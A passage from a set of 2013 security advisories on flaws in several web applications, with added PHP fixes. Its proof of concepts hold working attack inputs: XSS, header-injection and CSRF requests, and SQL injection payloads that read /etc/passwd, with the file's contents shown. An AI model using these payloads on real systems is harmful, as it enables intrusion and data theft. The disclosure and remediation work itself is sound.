REDIRECT: An attacker can redirect any user to any malicious website; the vulnerable URL is shown in the proof of concept above.
XSS: An attacker can execute arbitrary HTML or JavaScript code in a targeted user's browser, which can be leveraged to steal sensitive information such as user credentials, personal data, etc.
FULL PATH DISCLOSURE: An attacker can obtain the full path to the application. If the web root is leaked, attackers may combine that knowledge with file inclusion vulnerabilities to steal configuration files of the web application or other files on the operating system.

SYSTEMS AFFECTED

Versions of Telaen < v1.3.1.

SOLUTION

REDIRECT AND XSS: All data received by the application that can be modified by the user must be validated before any operation is performed with it.
FULL PATH DISCLOSURE: Disable the display of errors (PHP's display_errors) in the configuration and use a single, uniform error page.
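As an added illustration of the REDIRECT AND XSS fix (example code written for this page, not Telaen's own), the following PHP restricts redir.php to an allow-list of hosts and encodes f_email before it is placed in an HTML attribute. ALLOWED_HOSTS and the helper function names are assumptions.

```php
<?php
// Added example, not Telaen's own code. Demonstrates the two fixes the
// advisory asks for: validating the redirect target and encoding f_email
// before it is written into HTML. ALLOWED_HOSTS is an assumed setting.
declare(strict_types=1);

// Hosts that redir.php may send a browser to (assumed configuration value).
const ALLOWED_HOSTS = ['vulnerablesite.com', 'webmail.vulnerablesite.com'];

/**
 * Return the redirect target when it is acceptable, otherwise null.
 * Accepted: a site-relative path ("/telaen/index.php") or an http(s) URL
 * whose host is on ALLOWED_HOSTS. Everything else, including
 * "http://www.malicious-site.com" from the proof of concept, is rejected.
 */
function safe_redirect_target(string $candidate): ?string
{
    $candidate = trim($candidate);
    // Reject empty input and anything carrying CR/LF, which could otherwise
    // be used to inject additional response headers.
    if ($candidate === '' || strpbrk($candidate, "\r\n") !== false) {
        return null;
    }
    // Site-relative path: exactly one leading slash. "//evil.example" is a
    // protocol-relative URL that browsers resolve to another host.
    if ($candidate[0] === '/') {
        return (isset($candidate[1]) && $candidate[1] === '/') ? null : $candidate;
    }
    $parts = parse_url($candidate);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    // Exact host match: "vulnerablesite.com.evil.example" or a userinfo
    // trick like "vulnerablesite.com@evil.example" both fail here.
    if (!in_array(strtolower($parts['host']), ALLOWED_HOSTS, true)) {
        return null;
    }
    return $candidate;
}

/**
 * Encode a value for use inside a double-quoted HTML attribute. ENT_QUOTES
 * matters: the proof of concept breaks out of value="..." with a quote.
 */
function html_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// redir.php: in Telaen the target arrives as the raw query string.
function handle_redirect(string $queryString): void
{
    $target = safe_redirect_target($queryString);
    if ($target === null) {
        http_response_code(400);
        echo 'Invalid redirect target.';
        return;
    }
    header('Location: ' . $target, true, 302);
}

// index.php: echoing f_email back into the login form safely.
function login_email_field(array $get): string
{
    $email = isset($get['f_email']) && is_string($get['f_email']) ? $get['f_email'] : '';
    return '<input type="text" name="f_email" value="' . html_attr($email) . '">';
}

if (PHP_SAPI === 'cli') {
    // Self-check with the advisory's payloads (constructed input).
    var_dump(safe_redirect_target('http://www.malicious-site.com'));
    var_dump(safe_redirect_target('/telaen/index.php'));
    echo login_email_field(['f_email' => '"><script>alert("XSS")</script>']), "\n";
}
```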

REFERENCES

http://www.telaen.com
http://www.isecauditors.com

CREDITS

This vulnerability has been discovered by Manuel Garcia Cardenas (mgarcia (at) isecauditors (dot) com).

REVISION HISTORY

March 15, 2013: Initial release.
June 4, 2013: Last release

DISCLOSURE TIMELINE

March 15, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
March 20, 2013: Sent to development team.
March 28, 2013: New version scheduled.
April 4, 2013: New version published.
June 3, 2013: Advisory sent to lists.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.


2013-011: HTTP Response Splitting Vulnerability in WebCollab <= v3.30

Original release date: March 21st, 2013
Last revised: March 21st, 2013
Discovered by: Manuel Garcia Cardenas
Severity: 5/10 (CVSS Base Score)
CVE-ID: CVE-2013-2652

BACKGROUND

WebCollab is a collaborative web site for project workgroups. It aims to be easy and intuitive to use without being complicated or graphically intensive.
It uses a MySQL/PostgreSQL database backend coupled with PHP scripting and the Apache web server.
The latest version of WebCollab is 3.30 (Aotuhia), released in February 2013.

DESCRIPTION

An input validation problem exists within WebCollab that allows injecting CR (carriage return, %0D or \r) and LF (line feed, %0A or \n) characters into the server's HTTP response headers, resulting in an HTTP response splitting vulnerability.
The vulnerability exists in the "item" parameter on the page "/help/help_language.php".

This vulnerability not only gives attackers control of the remaining headers and body of the server response, but also allows them to create additional responses entirely under their control.

PROOF OF CONCEPT

Malicious request:

    http://vulnerablesite.com/webcollab/help/help_language.php?item=%0d%0a%20FakeHeader%3a%20WriteYourOwnHeader&lang=en&type=help

Server response:

    HTTP/1.1 302 Found
    Server: Apache/2.4.3 (Win32) OpenSSL/1.0.1c PHP/5.4.7
    Location: http://vulnerablesite.com/webcollab/help/en_help.php#
    FakeHeader: WriteYourOwnHeader
    Content-Length: 0
    Content-Type: text/html

BUSINESS IMPACT

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, and influence or misrepresent how web content is served, cached, or interpreted. Other attacks are also possible.

SYSTEMS AFFECTED

WebCollab <= v3.30

SOLUTION

All data received by the application that can be modified by the user must be validated before any operation is performed with it.

Validate the parameter "item" on the page "/help/help_language.php", line 34, where its value reaches header() unvalidated:

    $help_item = $_GET['item'];

    switch($_GET['type'] ) {
        case 'admin':
            header('Location: '.BASE_URL.'help/'.$lang_prefix.'_help_admin.php#'.$help_item );
            break;

        case 'help':
        default:
            header('Location: '.BASE_URL.'help/'.$lang_prefix.'_help.php#'.$help_item );
            break;
    }
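A hardened version of that logic, added here as an example and not taken from WebCollab: "item" is restricted to a short identifier so the %0d%0a sequence can never reach header(), and "type" is matched against an explicit list. BASE_URL and $lang_prefix are the names used on the page; the fallback values and the helper name are assumptions.

```php
<?php
// Added example, not WebCollab's code: a hardened help_language.php fragment.
declare(strict_types=1);

// Fallbacks so the file runs stand-alone; in WebCollab both come from its
// configuration (assumed values).
defined('BASE_URL') || define('BASE_URL', 'http://vulnerablesite.com/webcollab/');
$lang_prefix = $lang_prefix ?? 'en';

/**
 * Build the help redirect URL, or return null if the request is not valid.
 * Only [A-Za-z0-9_-]{1,64} is accepted for "item", which excludes CR, LF,
 * percent sequences and arrays (item[]=...). "type" must be a known key.
 */
function help_redirect_url(array $get, string $baseUrl, string $langPrefix): ?string
{
    $item = $get['item'] ?? '';
    $type = $get['type'] ?? 'help';

    if (!is_string($item) || preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $item) !== 1) {
        return null;
    }
    $pages = ['admin' => '_help_admin.php', 'help' => '_help.php'];
    if (!is_string($type) || !isset($pages[$type])) {
        return null;
    }
    // The language prefix is server-controlled, but it is checked anyway in
    // case it is ever derived from user input.
    if (preg_match('/\A[a-z]{2}(_[A-Z]{2})?\z/', $langPrefix) !== 1) {
        return null;
    }
    return $baseUrl . 'help/' . $langPrefix . $pages[$type] . '#' . rawurlencode($item);
}

$url = help_redirect_url($_GET, BASE_URL, $lang_prefix);
if ($url === null) {
    // Reject instead of redirecting: the PoC value "%0d%0a FakeHeader: ..."
    // fails the identifier check and produces this response.
    http_response_code(400);
    exit('Invalid help request.');
}
header('Location: ' . $url, true, 302);
exit;
```

Current PHP releases also refuse header() values containing CR or LF, but the input check above keeps the protection independent of the PHP version in use.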
                      

REFERENCES

http://webcollab.sourceforge.net
http://www.isecauditors.com

CREDITS

This vulnerability has been discovered by Manuel Garcia Cardenas (mgarcia (at) isecauditors (dot) com).

REVISION HISTORY

March 21, 2013: Initial release.

DISCLOSURE TIMELINE

March 21, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
March 22, 2013: CVE-ID requested and received.
October 17, 2013: First contact with the developer. Pre-advisory sent.
October 18, 2013: Developer team releases a new version.
October 24, 2013: Advisory release.


2013-012: Multiple Full Path Disclosure Vulnerabilities in TinyWebGallery <= v1.8.9

Original release date: March 19th, 2013
Last revised: April 6th, 2013
Discovered by: Manuel Garcia Cardenas
Severity: 5/10 (CVSS Base Score)
CVE-ID: CVE-2013-2631

BACKGROUND

TinyWebGallery (TWG) is a photo album / gallery released under a modified GPL open source license. It is a server-based gallery script for images that uses Ajax, PHP, XML and the graphics library GDlib / ImageMagick.

DESCRIPTION

This vulnerability could allow a malicious user to view internal path information of the host, because some files fail to check that the required libraries have been included.
The error is triggered through the parameters "twg_browserx" and "twg_browsery" in the page image.php.

PROOF OF CONCEPT

The attacker can get the full installation path of TinyWebGallery by browsing to either of these URLs:

http://vulnerablesite.com/tw/image.php?fontscale=1&twg_browserx[]=1706&twg_browsery=890&twg_xmlhttp=r
http://vulnerablesite.com/tw/image.php?fontscale=1&twg_browserx=1706&twg_browsery[]=890&twg_xmlhttp=r

The information obtained contains the full path to the files:

Fatal error: Unsupported operand types in /var/www/tw/inc/ajaxserver.inc.php on line 157

BUSINESS IMPACT

Full path disclosure vulnerabilities enable an attacker to learn the path to the web root. This information can be used to launch further attacks.

SYSTEMS AFFECTED

TinyWebGallery <=1.8.9

SOLUTION

Update to version 1.9
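The fix is the vendor's update, but the two causes behind this full path disclosure (and the one in the Telaen advisory above) are generic: a parameter arriving as an array instead of a number, and PHP printing the resulting error to the client. The following PHP, added here as an example and not TinyWebGallery's or Telaen's code, shows both countermeasures; the parameter ranges and function names are assumptions.

```php
<?php
// Added example, not TinyWebGallery's or Telaen's code. Rejects input that is
// not a plain integer (the proof of concept sends twg_browserx[]=1706, an
// array) and keeps PHP errors, and with them file paths, off the response.
declare(strict_types=1);

// 1. Production error handling: log, never display.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
error_reporting(E_ALL);

// Every uncaught error or exception ends in one generic page, so error pages
// are uniform and carry no path information.
set_exception_handler(function (Throwable $e): void {
    error_log($e->getMessage() . ' in ' . $e->getFile() . ':' . $e->getLine());
    http_response_code(500);
    echo 'An internal error occurred.';
});
set_error_handler(function (int $no, string $msg, string $file, int $line): bool {
    throw new ErrorException($msg, 0, $no, $file, $line);
});

/**
 * 2. Return the integer value of a request parameter, or null when it is
 * absent, non-numeric, out of range, or supplied as an array. The is_scalar
 * check is what stops "twg_browserx[]=1706" before any arithmetic runs.
 */
function int_param(array $src, string $name, int $min, int $max): ?int
{
    if (!isset($src[$name]) || !is_scalar($src[$name])) {
        return null;
    }
    $v = filter_var($src[$name], FILTER_VALIDATE_INT, [
        'options' => ['min_range' => $min, 'max_range' => $max],
    ]);
    return $v === false ? null : $v;
}

/** Viewport dimensions for image scaling, with safe defaults on bad input. */
function viewport_from_request(array $get): array
{
    $x = int_param($get, 'twg_browserx', 1, 10000) ?? 1024;  // assumed range
    $y = int_param($get, 'twg_browsery', 1, 10000) ?? 768;   // and defaults
    return ['x' => $x, 'y' => $y];
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs: the advisory's array trick, then a normal request.
    var_dump(viewport_from_request(['twg_browserx' => ['1706'], 'twg_browsery' => '890']));
    var_dump(viewport_from_request(['twg_browserx' => '1706', 'twg_browsery' => '890']));
}
```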

REFERENCES

http://www.tinywebgallery.com
http://www.isecauditors.com

CREDITS

This vulnerability has been discovered by Manuel Garcia Cardenas (mgarcia (at) isecauditors (dot) com).

REVISION HISTORY

March 19, 2013: Initial release.

April 6, 2013: Final release.

DISCLOSURE TIMELINE

March 19, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)

March 21, 2013: Send to Vendor.
March 21, 2013: New version that includes patched code.
April 6, 2013: Sent to lists.


2013-014: Multiple reflected XSS vulnerabilities in Atmail WebMail.

Original release date: March 25th, 2013
Last revised: March 25th, 2013
Discovered by: Vicente Aguilera Diaz
Severity: 4.3/10 (CVSSv2 Base Score)
CVE-ID: CVE-2013-6229

BACKGROUND

Atmail allows users to access IMAP mailboxes on any server of their choice. The software provides a comprehensive email suite for accessing user mailboxes, with built-in Calendar and Address Book features. The WebMail client of Atmail supports any existing IMAP server running on Unix/Linux or Windows systems.

DESCRIPTION

Multiple reflected XSS vulnerabilities have been detected:
1) in the view attachment message process
2) in the search message with filter process
3) in the delete message process
These vulnerabilities allow arbitrary HTML/script code to be executed in the context of the victim user's browser.

PROOF OF CONCEPT

1) View attachment message process

When a user opens a file attachment in an email, the link is as follows:

    http://<atmail-server>/index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/<ID>/filenameOriginal/<file>

where:
    - <atmail-server> is the Atmail WebMail server
    - <ID> is the unique ID of the message that contains the attachment
    - <file> is the attachment file in the message

A malicious user can inject arbitrary HTML/script code in the <file> parameter. For example:

    http://<atmail-server>/index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/<ID>/filenameOriginal/test.txt<H1><marquee>This+is+an+XSS+example

2) Search message with filter process

When a user searches messages with a filter (for example, using the "Friends" filter), the request is as follows:

    POST /index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX/resultContext/searchResultsTab5 HTTP/1.1
    Host: <atmail-server>
    ...
    searchQuery=&goBack=6&from=&to=&subject=&body=&filter=<filter>

where:
    - <atmail-server> is the Atmail WebMail server
    - <filter> is the name of the filter selected by the user

A malicious user can inject arbitrary HTML/script code in the <filter> parameter. Also, this POST HTTP request can be converted into a GET HTTP request, making it easier to exploit the vulnerability. For example:

    http://<atmail-server>/index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX/resultContext/searchResultsTab5?searchQuery=&goBack=6&from=&to=&subject=&body=&filter=friends<H1><marquee>This+is+an+XSS+example

3) Delete message process

When a user selects and deletes a message, the request is as follows:

    POST /index.php/mail/mail/movetofolder/fromFolder/INBOX/toFolder/INBOX.Trash HTTP/1.1
    Host: <atmail-server>
    ...
    resultContext=messageList&listFolder=INBOX&pageNumber=1&unseen%5B21%5D=0&mailId%5B%5D=<MailID>&unseen%5B20%5D=0&unseen%5B16%5D=0&unseen%5B15%5D=0&unseen%5B14%5D=0&unseen%5B12%5D=0&unseen%5B11%5D=0&unseen%5B10%5D=0&unseen%5B9%5D=0&unseen%5B8%5D=0&unseen%5B6%5D=0&unseen%5B5%5D=0&unseen%5B4%5D=0&unseen%5B3%5D=0&unseen%5B2%5D=0&unseen%5B1%5D=0

where:
    - <atmail-server> is the Atmail WebMail server
    - <MailID> is the identifier (number) of the mail selected by the user

A malicious user can inject arbitrary HTML/script code in the <MailID> parameter. Also, this POST HTTP request can be converted into a GET HTTP request, making it easier to exploit the vulnerability. For example:

    http://<atmail-server>/index.php/mail/mail/movetofolder/fromFolder/INBOX/toFolder/INBOX.Trash?resultContext=messageList&listFolder=INBOX&pageNumber=1&unseen%5B21%5D=0&mailId%5B%5D=<H1><marquee>This+is+an+XSS+example&unseen%5B20%5D=0&unseen%5B16%5D=0&unseen%5B15%5D=0&unseen%5B14%5D=0&unseen%5B12%5D=0&unseen%5B11%5D=0&unseen%5B10%5D=0&unseen%5B9%5D=0&unseen%5B8%5D=0&unseen%5B6%5D=0&unseen%5B5%5D=0&unseen%5B4%5D=0&unseen%5B3%5D=0&unseen%5B2%5D=0&unseen%5B1%5D=0

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, which can be leveraged to steal sensitive information such as user credentials, personal data, etc.

SYSTEMS AFFECTED

Tested in Atmail 7.0.2. Other versions may be affected too.

SOLUTION

-

REFERENCES

http://www.atmail.com
http://www.isecauditors.com

CREDITS

This vulnerability has been discovered by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).

REVISION HISTORY

March 9, 2013: Initial release
March 22, 2013: Last revision

DISCLOSURE TIMELINE

March 9, 2013: Discovered by Internet Security Auditors
March 22, 2013: Advisory updated with new XSS vulnerable resources
October 08, 2013: First contact with developer team
October 16, 2013: Second contact with developer team
November 28, 2013: Third contact with developer team
January 10, 2014: Last contact and release


2013-016: CSRF vulnerability in LinkedIn

Original release date: June 8th, 2013
Last revised: July 11th, 2013
Discovered by: Eduardo Garcia Melia
Severity: 4.3/10 (CVSSv2 Base Score)

BACKGROUND

LinkedIn is a social networking service and website (www.linkedin.com) for professionals. The site officially launched on May 5, 2003. As of September 30, 2012 (the end of the third quarter), professionals were signing up to join LinkedIn at a rate of approximately two new members per second. Currently, over 175 million professionals use LinkedIn to exchange information, ideas and opportunities.

DESCRIPTION

CSRF (Cross-site Request Forgery) is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help from social engineering (such as sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operations in the case of a normal user. If the targeted end user is the administrator account, this can compromise the entire web application.

More info about CSRF:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

LinkedIn is vulnerable to CSRF attacks in the "Join Groups" functionality. The only token used to authenticate the user is a session cookie, and this cookie is sent automatically by the browser in every request.
LinkedIn Groups provide a place for professionals in the same industry or with similar interests to share content, find answers, post and view jobs, make business contacts, and establish themselves as industry experts.
An attacker can create a page that includes requests to the "Join Group" functionality of LinkedIn and thereby add to his group the users who, being authenticated, visit the attacker's page.
The attack is facilitated because the "Join Group" request can be made with the HTTP GET method instead of the POST method normally used by the "Join Group" button.

PROOF OF CONCEPT

Next, we show a typical request to the "Join Group" functionality:

POST /nhome/nux/group HTTP/1.1
Host: www.linkedin.com
...

grpId=<groupid>&trk=nux-group-join

We can also use the HTTP GET method instead of the HTTP POST method used in this request, which makes exploitation of the CSRF vulnerability easier. The following HTTP request provokes the same result as the original HTTP POST request:

GET /nhome/nux/group?grpId=<groupid>&trk=nux-group-join HTTP/1.1
Host: www.linkedin.com
...

1. The attacker creates a web page "csrf-exploit.html" that performs an HTTP GET request to the "Join Group" functionality.

For example:
...
<img height="0" src="http://www.linkedin.com/nhome/nux/group?grpId=<GROUPID>&trk=nux-group-join" width="0" />
...

2. A user authenticated in LinkedIn visits the "csrf-exploit.html" page controlled by the attacker.

For example, the attacker sends a message to the victim (the messaging system provided by LinkedIn is preferable, as it ensures that the victim user is authenticated) and, using social engineering techniques, induces the victim to visit his page.

3. The attacker receives an invitation request from the victim user, so the attacker just accepts this invitation and the user is added to his group.

BUSINESS IMPACT

A malicious user can cause victims to send a request to join his group without their consent or knowledge.

SYSTEMS AFFECTED

LinkedIn service.

SOLUTION

Pending.
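The advisory records no fix, so the following is an added example (not LinkedIn's code) of how a state-changing "join group" endpoint defeats the forged request described above: it requires POST, which the <img> trick cannot issue, and a per-session synchronizer token that a cross-origin page cannot read. Function names, field names and the grpId format are assumptions.

```php
<?php
// Added example, not LinkedIn's code: a join-group endpoint that rejects the
// forged GET request in this advisory and any POST lacking the session token.
declare(strict_types=1);

/** Create the session token once and return it for embedding in forms. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/**
 * Decide whether a join-group request is legitimate.
 * $server/$post/$session mirror $_SERVER/$_POST/$_SESSION so the check can be
 * exercised without a web server. Returns null on success, else the reason.
 */
function join_group_rejection(array $server, array $post, array $session): ?string
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return 'method';   // the GET variant from the proof of concept stops here
    }
    $expected = $session['csrf_token'] ?? '';
    $given = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($given) || !hash_equals($expected, $given)) {
        return 'token';    // a page on another origin cannot know this value
    }
    if (!isset($post['grpId']) || !is_string($post['grpId'])
        || preg_match('/\A[0-9]{1,20}\z/', $post['grpId']) !== 1) {
        return 'grpId';    // assumed identifier format
    }
    return null;
}

/** The genuine form embeds the token; the same-origin policy keeps it private. */
function join_group_form(array &$session, string $groupId): string
{
    return '<form method="post" action="/nhome/nux/group">'
        . '<input type="hidden" name="grpId" value="' . htmlspecialchars($groupId, ENT_QUOTES) . '">'
        . '<input type="hidden" name="csrf_token" value="' . csrf_token($session) . '">'
        . '<button type="submit">Join Group</button></form>';
}

if (PHP_SAPI === 'cli') {
    // Constructed requests: the forged GET, a POST without a token, and a
    // genuine submission carrying the session's token.
    $session = [];
    $token = csrf_token($session);
    var_dump(join_group_rejection(['REQUEST_METHOD' => 'GET'], ['grpId' => '12345'], $session));
    var_dump(join_group_rejection(['REQUEST_METHOD' => 'POST'], ['grpId' => '12345'], $session));
    var_dump(join_group_rejection(['REQUEST_METHOD' => 'POST'],
        ['grpId' => '12345', 'csrf_token' => $token], $session));
}
```

Marking the session cookie SameSite=Lax (a later browser feature) adds a second layer, since the cookie would then not accompany the cross-site request at all.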

REFERENCES

http://www.linkedin.com
http://www.isecauditors.com

CREDITS

This vulnerability has been discovered by Eduardo Garcia Melia (egarcia (at) isecauditors (dot) com).

REVISION HISTORY

June 08, 2013: Initial release
June 11, 2013: New update

DISCLOSURE TIMELINE

June 11, 2013: Vulnerability acquired by Internet Security Auditors.
July 11, 2013: Sent to LinkedIn SecTeam.
August 15, 2013: Vulnerability fixed by LinkedIn SecTeam.
October 17, 2013: Disclosure


2013-017: SQL Injection vulnerability in "Project'Or RIA" allow arbitrary access to the database and the file system.

Original release date: July 26th, 2013
Last revised: July 26th, 2013
Discovered by: Vicente Aguilera Diaz
Severity: 6.8/10 (CVSSv2 Base Score)
CVE-ID: CVE-2013-6164

BACKGROUND

Project'Or RIA is an open source Project Management Software, trying to gather in a single tool every functionality needed to organize your projects.
The objective is to keep it simple, easy to use on a day to day activity, while covering most of the project management functionalities.

DESCRIPTION

A SQL injection vulnerability has been detected in the "Affectations" functionality of this application. The affected resource and parameter are the following:

Resource:
/view/objectDetail.php

Parameter:
objectId

This vulnerability allows the execution of arbitrary SQL code against the database, and arbitrary access to the file system.

PROOF OF CONCEPT

When a user accesses the "Environmental parameters / Affectations" functionality, an output with a list of resources is generated. If the user accesses the details of a resource, a request like the following is generated:

    POST /view/objectDetail.php?destinationWidth=1017 HTTP/1.1
    Host: <projectorria-server>

    objectClass=Affectation&objectId=000042&listIdFilter=&listFilterClause=

where the "objectId" value contains the resource identifier.
A malicious user can inject arbitrary SQL code through the "objectId" parameter of this request. For example:

1. Accessing the file system

1.1 /etc/passwd

Modified parameter: objectId

Value:
    99942+union+(select+load_file('/etc/passwd'),null,null,null,null,null,null,null,null,null,null,null+from+dual)

Request:

    POST /view/objectDetail.php?destinationWidth=1017 HTTP/1.1
    Host: <projectorria-server>

    objectClass=Affectation&objectId=99942+union+(select+load_file('/etc/passwd'),null,null,null,null,null,null,null,null,null,null,null+from+dual)&listIdFilter=&listFilterClause=

Response:

    HTTP/1.1 200 OK
    ...
    <span dojoType="dijit.form.TextBox" type="text" id="id" name="id" class="display" readonly tabindex="-1" style="width: 75px;"
                                          value="root:x:0:0:root:/root:/bin/bash
                                          daemon:x:1:1:daemon:/usr/sbin:/bin/sh
                                          bin:x:2:2:bin:/bin:/bin/sh
                                          sys:x:3:3:sys:/dev:/bin/sh
                                          sync:x:4:65534:sync:/bin:/bin/sync
                                          games:x:5:60:games:/usr/games:/bin/sh
                                          man:x:6:12:man:/var/cache/man:/bin/sh
                                          lp:x:7:7:lp:/var/spool/lpd:/bin/sh
                                          mail:x:8:8:mail:/var/mail:/bin/sh
                                          news:x:9:9:news:/var/spool/news:/bin/sh
                                          uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
                                          proxy:x:13:13:proxy:/bin:/bin/sh
                                          www-data:x:33:33:www-data:/var/www:/bin/sh
                                          backup:x:34:34:backup:/var/backups:/bin/sh
                                          list:x:38:38:Mailing List Manager:/var/list:/bin/sh
                                          irc:x:39:39:ircd:/var/run/ircd:/bin/sh
                                          gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
                                          nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
                                          libuuid:x:100:101::/var/lib/libuuid:/bin/sh
                                          syslog:x:101:103::/home/syslog:/bin/false
                                          whoopsie:x:102:104::/nonexistent:/bin/false
                                          landscape:x:103:105::/var/lib/landscape:/bin/false
                                          messagebus:x:104:108::/var/run/dbus:/bin/false
                                          ntpd:x:105:111::/var/run/openntpd:/bin/false
                                          postfix:x:106:113::/var/spool/postfix:/bin/false
                                          babynus:x:1000:1000::/home/babynus:/bin/bash
                                          bind:x:107:115::/var/cache/bind:/bin/false
                                          sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
                                          zend:x:109:116::/usr/local/zend/gui/lighttpd/:/bin/false
                                          mysql:x:110:117:MySQL Server,,,:/nonexistent:/bin/false
                                          nagios:x:111:118::/var/lib/nagios:/bin/false
                                          smmta:x:112:119:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
                                          smmsp:x:113:120:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
    postgres:x:114:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
    " ></span>
    ...

Obtained info (/etc/passwd):
                                           root:x:0:0:root:/root:/bin/bash
                                           daemon:x:1:1:daemon:/usr/sbin:/bin/sh
                                           bin:x:2:2:bin:/bin:/bin/sh
                                           sys:x:3:3:sys:/dev:/bin/sh
                                           sync:x:4:65534:sync:/bin:/bin/sync
                                           games:x:5:60:games:/usr/games:/bin/sh
                                           man:x:6:12:man:/var/cache/man:/bin/sh
                                           lp:x:7:7:lp:/var/spool/lpd:/bin/sh
                                           mail:x:8:8:mail:/var/mail:/bin/sh
                                           news:x:9:9:news:/var/spool/news:/bin/sh
                                           uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
                                           proxy:x:13:13:proxy:/bin:/bin/sh
                                           www-data:x:33:33:www-data:/var/www:/bin/sh
                                           backup:x:34:34:backup:/var/backups:/bin/sh
                                           list:x:38:38:Mailing List Manager:/var/list:/bin/sh
                                           irc:x:39:39:ircd:/var/run/ircd:/bin/sh
                                           gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
                                           nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
                                           libuuid:x:100:101::/var/lib/libuuid:/bin/sh
                                           syslog:x:101:103::/home/syslog:/bin/false
                                           whoopsie:x:102:104::/nonexistent:/bin/false
                                           landscape:x:103:105::/var/lib/landscape:/bin/false
                                           messagebus:x:104:108::/var/run/dbus:/bin/false
                                           ntpd:x:105:111::/var/run/openntpd:/bin/false
                                           postfix:x:106:113::/var/spool/postfix:/bin/false
                                           babynus:x:1000:1000::/home/babynus:/bin/bash
                                           bind:x:107:115::/var/cache/bind:/bin/false
                                           sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
                                           zend:x:109:116::/usr/local/zend/gui/lighttpd/:/bin/false
                                           mysql:x:110:117:MySQL Server,,,:/nonexistent:/bin/false
                                           nagios:x:111:118::/var/lib/nagios:/bin/false
                                           smmta:x:112:119:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
                                           smmsp:x:113:120:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
                                           postgres:x:114:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
                

2. Obtaining database private information

2.1 Obtaining TABLE_NAME from INFORMATION_SCHEMA.TABLES

Modified parameter: objectId

Value:
    99942+union+(select+@@version,null,null,null,null,null,null,null,null,null,null,null+from+dual)

Request:

    POST /view/objectDetail.php?destinationWidth=1017 HTTP/1.1
    Host: <projectorria-server>

    objectClass=Affectation&objectId=99942+union+(select+@@version,null,null,null,null,null,null,null,null,null,null,null+from+dual)&listIdFilter=&listFilterClause=

Response:

    HTTP/1.1 200 OK

    <span dojoType="dijit.form.TextBox" type="text" id="id" name="id" class="display" readonly tabindex="-1" style="width: 75px;" value="5.5.24-0ubuntu0.12.04.1" >

Obtained info (MySQL version):
    5.5.24-0ubuntu0.12.04.1

BUSINESS IMPACT

An attacker can execute arbitrary SQL code and gain access to private information stored in the database or the file system.

SYSTEMS AFFECTED

Tested in Project'Or RIA v3.4.0

SOLUTION

Pending.
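No fix is recorded in the advisory. As an added example (not Project'Or RIA's code), the PHP below shows the pattern the proof of concept relies on, objectId concatenated into the statement, beside a hardened version that validates the identifier and binds it as a parameter. The table and column names, the helper names and the SQLite demo are assumptions.

```php
<?php
// Added example, not Project'Or RIA's code: vulnerable query construction
// shown beside a validated, parameterised replacement.
declare(strict_types=1);

/** VULNERABLE (for comparison only): the request value becomes SQL text. */
function affectation_sql_vulnerable(string $objectId): string
{
    // "99942 union (select load_file('/etc/passwd'),...)" is spliced into
    // the statement, which is exactly what the proof of concept exploits.
    return "SELECT * FROM affectation WHERE id = " . $objectId;
}

/**
 * HARDENED: accept only a decimal identifier (the legitimate request sends
 * "000042") and let the driver bind it. Throws on malformed input so the
 * caller can answer with a 400 instead of running anything.
 */
function load_affectation(PDO $db, $objectId): ?array
{
    if (!is_string($objectId) || preg_match('/\A[0-9]{1,10}\z/', $objectId) !== 1) {
        throw new InvalidArgumentException('objectId must be a decimal identifier');
    }
    $stmt = $db->prepare('SELECT * FROM affectation WHERE id = :id');
    $stmt->bindValue(':id', (int) $objectId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/** Connection options that help even when a bind is missed somewhere else. */
function open_database(string $dsn, string $user, string $pass): PDO
{
    return new PDO($dsn, $user, $pass, [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,  // real server-side prepared statements
    ]);
}

if (PHP_SAPI === 'cli') {
    // Constructed demo on an in-memory SQLite database, so no MySQL is needed.
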